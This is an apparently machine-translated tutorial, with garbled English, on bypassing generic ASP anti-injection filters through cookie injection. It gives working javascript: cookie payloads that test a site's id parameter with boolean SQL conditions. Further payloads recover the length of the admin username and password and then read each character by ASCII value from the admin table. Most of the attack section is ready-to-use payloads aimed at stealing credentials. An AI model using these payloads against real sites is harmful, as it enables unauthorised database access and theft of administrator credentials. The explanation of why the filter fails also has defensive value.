Using cookie injection to crack ASP general anti-injection program

After a website was injected into the Trojan, is very depressed, the site has been put into the general ASP anti-injection program, but still be injected.

After consulting a lot of information, we finally found out the problem.

Now many sites have been added to prevent injection system code, you enter the injection statement will not be injected ~ ~
It feels like such a good injection system, but the anti-injection system does not notice the problem of Cookies!
So there is a cookie injection ~ ~

Let's look at what happens when cookies are injected!
If you have studied ASP
You should know Request.QueryString (get) or Request.Form (POST)!
Oh, yes, that's what we use to read the value in the specified key that the user sends to the Web server!
We sometimes write in order to simplify the code
Id=request ("ID")
This is a simple way of writing, but the problem is coming ~ ~ ~
Let's look at how the Web service reads the data, he takes the data from the get, does not retrieve the data in the post, and takes the data from the cookies.

Let's take a look at the anti-injection system, and he will detect the data in get and post, if there are special characters (of course, the character is injected)!
Prohibit the submission of data! But he's not testing cookies! The problem is here ~ ~ ~
So how do we test if there's a problem with cookies?

Please look at the connection below (for example, so the connection is not true)

Http://www.xxx.com/1.asp?id=123

If we only lose http://www.xxx.com/1.asp

, you can't see the normal data because there are no parameters!
We would like to know if there is a problem with cookies (that is, there are no request ("XXX") format questions),
First with IE input
Http://www.xxx.com/1.asp
Loading Web page, showing abnormal (reason for no input parameters)
Then enter in IE input box
Javascript:alert (document.cookie= "id=" +escape ("123"));
Press Enter and you will see a pop-up dialog box content is: id=123
After you refresh a page, if the display is normal, the representation is used
Request ("ID") this format collects data ~ ~ ~, this format can test the cookies into

Enter in the input box
Javascript:alert (document.cookie= "id=" +escape ("123 and 3=3"));
Refresh the page, if the display is normal, you can try the next step (if not normal, it may also have filtered)

Javascript:alert (document.cookie= "id=" +escape) ("123 and 3=4"); Refresh the page
If the abnormal display, this means that there are injected ~ ~ ~

If the programmer is using
Request.QueryString
Or
Request.Form
When collecting data, it is not possible to use cookies to bypass the injection system, because the service program is straightforward to read data from Get or post, does the cookie have

Data, the Web server is ignored, so it can not be used! ~

--------------------------------------------------------------------------
For the convenience of friends who do not know
Javascript:alert (document.cookie= "id=" +escape ("123"));
I mean, I'll explain.
Document.cookie= "id=" +escape ("123") is to save 123 to the ID of the cookie.
Alert (XXX) is the Bomb dialog box

Guess the length of the Administrator account:
Javascript:alert (document.cookie= "id=" +escape ("(Select Len (username) from admin) =5");

Guess the length of the administrator password:
Javascript:alert (document.cookie= "id=" +escape ("(Select Len (password) from admin) =16");

Guess what's in username:

Guess the admin table, the username field, the 1th bit of the ASCII code.
Javascript:alert (document.cookie= "id=" +escape ("(Select ASC (Mid (username,1,1)) from admin) =97");
(Mid (column name, 2, 1))
(Mid (column name, 3, 1))
....

Guess what's in password:
Guess the admin table, the password field, the 1th bit of the ASCII code.
Javascript:alert (document.cookie= "id=" +escape ("(Select ASC (Mid (password,1,1)) from admin) <97");
(Mid (column name, 2, 1))
(Mid (column name, 3, 1))
....